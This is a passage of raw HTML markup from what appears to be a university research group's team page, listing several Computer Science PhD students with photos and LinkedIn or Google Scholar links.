gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c68 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c69-outer\">\n            <div data-colibri-id=\"182-c69\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c69 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c70\" class=\"d-block style-854 style-local-182-c70 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-282038166_2492815234187345_4129762528023780269_n-e1697142834100.jpg\" class=\"wp-image-1659 style-854-image style-local-182-c70-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c70-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c71\" class=\"h-global-transition-all h-heading style-850 style-local-182-c71 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c71\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c72\" class=\"h-text h-text-component style-851 style-local-182-c72 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c73\" class=\"h-text h-text-component style-902 style-local-182-c73 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c74\" class=\"style-855 style-local-182-c74 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c75-outer\">\n            <div data-colibri-id=\"182-c75\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c75 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c76\" class=\"d-block style-849 style-local-182-c76 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg\" class=\"wp-image-1336 style-849-image style-local-182-c76-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c76-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c77\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-901 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"style-853 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n            <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c81 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c82\" class=\"d-block style-856 style-local-182-c82 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg\" class=\"wp-image-966 style-856-image style-local-182-c82-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c82-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c83\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c84\" class=\"h-text h-text-component style-851 style-local-182-c84 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-852 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"style-857 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n            <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c88\" class=\"d-block style-854 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/anupam.jpg\" class=\"wp-image-1624 style-854-image style-local-182-c88-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c88-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c89\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anupam Sarker</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-902 style-local-182-c91 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c92\" class=\"style-855 style-local-182-c92 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n            <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg\" class=\"wp-image-863 style-854-image style-local-182-c94-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c95\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassini</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n            <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n                  <!---->\n                  <div 